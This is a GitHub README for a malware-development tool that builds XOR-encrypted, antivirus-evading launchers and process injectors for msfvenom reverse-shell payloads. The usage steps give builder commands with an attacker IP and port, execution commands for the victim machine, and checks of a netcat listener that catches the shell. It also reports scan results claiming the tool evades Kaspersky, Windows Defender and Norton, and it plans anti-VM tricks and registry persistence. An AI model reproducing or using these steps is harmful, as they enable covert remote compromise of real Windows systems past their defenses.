Skip to content

Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.

Notifications You must be signed in to change notification settings

cocomelonc/peekaboo

Repository files navigation

Peekaboo

Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.

Main logic

XOR encryption and decryption for functions call and main payload - msfvenom reverse shell as example.

Usage

1. DLL

on attacker machine

check your IP:

ip a

attacker machine IP

run python script with flags:

python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1

run python script

then on victim machine (windows 10 x64):

run on powershell or cmd promt:

rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy

run on victim machine

check on attacker machine:

check your netcat listener:

check netcat listener

check IP address

2.Injector

on attacker machine:

check attacker ip:

ip a

check IP

run python script on linux (for example process mspaint.exe):

python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2

run python script

then on victim machine run (windows 10 x64):

.\peekaboo.exe

or click (if -m windows param)

run on victim machine

check on attacker machine:

check your netcat listener:

check netcat listener

3. NT API injector

run python script on linux (for example process mspaint.exe):

python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3

enc and compile nt

then on victim machine (windows 10 x64):

.\peekaboo.exe

run malware

run malware

Issues.

Tested on:

  1. Attacker machines: Kali linux 2020.1, Windows 10 x64
  2. Victim machine: Windows 7 x64, Windows 10 x64
  3. Payload: windows x64 reverse shell from msfvenom
  4. AV Engines: Kaspersky, Windows Defender, Norton Antivirus Plus

virus total result:

02 september 2021

virustotal

https://www.virustotal.com/gui/file/c930b9aeab693d36c68e7bcf6353c7515b8fffc8f9a9233e49e90da49ab5d470/detection

30 december 2021 (NT API injector)

virtustotal 2

https://www.virustotal.com/gui/file/743f50e92c6ef48d6514e0ce2a255165f83afb1ae66deefd68dac50d80748e55/detection

antiscan.me result:

11 january 2022 (NT API injector)

antiscan

https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9

websec.nl scanner result:

10 October 2024

websec

https://websec.net/scanner/result/a3583316-cb72-4894-bd22-48241ca79db9

TODO

  • Compile injector in Kali linux
  • XOR + AES aes branch
  • Calling Windows API functions by hash names
  • Find Kernel32 base via asm style
  • One python builder
  • Anti-VM tricks
  • Persistence via Windows Registry run keys
  • Replace msfvenom shell to donut payload???

Attention

This tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause

License

MIT

About

Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published